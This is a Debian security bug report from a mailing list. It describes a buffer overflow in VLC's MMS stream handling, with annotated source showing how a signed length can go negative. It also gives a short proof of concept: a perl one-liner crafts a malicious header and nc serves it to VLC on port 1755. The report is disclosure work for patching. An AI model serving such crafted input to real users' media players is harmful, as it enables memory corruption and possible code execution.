Bug#496265: vlc: buffer overflow in mms handling

Nico Golde nion at debian.org
Sun Aug 24 00:18:02 UTC 2008 

Package: vlc
Version: 0.8.6.i-1
Severity: grave
Tags: security

Hi,
the following security issue was published for vlc

static int mms_ReceiveCommand( access_t *p_access )
{
    access_sys_t *p_sys = p_access->p_sys;

    for( ;; )
    {
        int i_used;
        int i_status;

        if( NetFillBuffer( p_access ) < 0 )
        {
            msg_Warn( p_access, "cannot fill buffer" );
            return VLC_EGENERIC;
        }
        if( p_sys->i_buffer_tcp > 0 )
        {
[1]         i_status = mms_ParseCommand( p_access, p_sys->buffer_tcp,
                                         p_sys->i_buffer_tcp, &i_used );
[2]         if( i_used < MMS_BUFFER_SIZE )  
            {
[3]             memmove( p_sys->buffer_tcp, p_sys->buffer_tcp + i_used,
                         MMS_BUFFER_SIZE - i_used );    //BUG! i_used overflow

(...)

[1] - function that sets i_used to negative value, see below
[2] - i_used is signed, so predicate is true
[3] - actual overflow, we have good control over what is written

static int  mms_ParseCommand( access_t *p_access,
                              uint8_t *p_data,
                              int i_data,
                              int *pi_used )
(...)
    i_length = GetDWLE( p_data + 8 ) + 16;
(...)
    if( i_length > p_sys->i_cmd )
    {
        msg_Warn( p_access,
                  "truncated command (missing %d bytes)",
                   i_length - i_data  );
        p_sys->i_command = 0;
        return -1;
    }
[1] else if( i_length < p_sys->i_cmd )
    {
        p_sys->i_cmd = i_length;
[2]     *pi_used = i_length;
    }

(...)

[1] - predicate is true
[2] - sets i_used from mms_ReceiveCommand

- - Proof of concept -

on localhost:

perl -e 'print "aaaa\xce\xfa\x0b\xb0\xef\xff\xef\xff"; print "a"x100' > headshot
nc -l -v -p 1755 < headshot 

open this url in VLC:

mmst://127.0.0.1/


I can confirm this issue exists.
Please see http://www.orange-bat.com/adv/2008/adv.08.24.txt for the original advisory.

I'll follow up on this bug report with a CVE id soon.

Kind regards
Nico

-- 
Nico Golde - http://www.ngolde.de - nion at jabber.ccc.de - GPG: 0x73647CFF
For security reasons, all text in this mail is double-rot13 encrypted.
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 197 bytes
Desc: not available
Url : http://lists.alioth.debian.org/pipermail/pkg-multimedia-maintainers/attachments/20080824/6a565300/attachment.pgp

More information about the pkg-multimedia-maintainers mailing list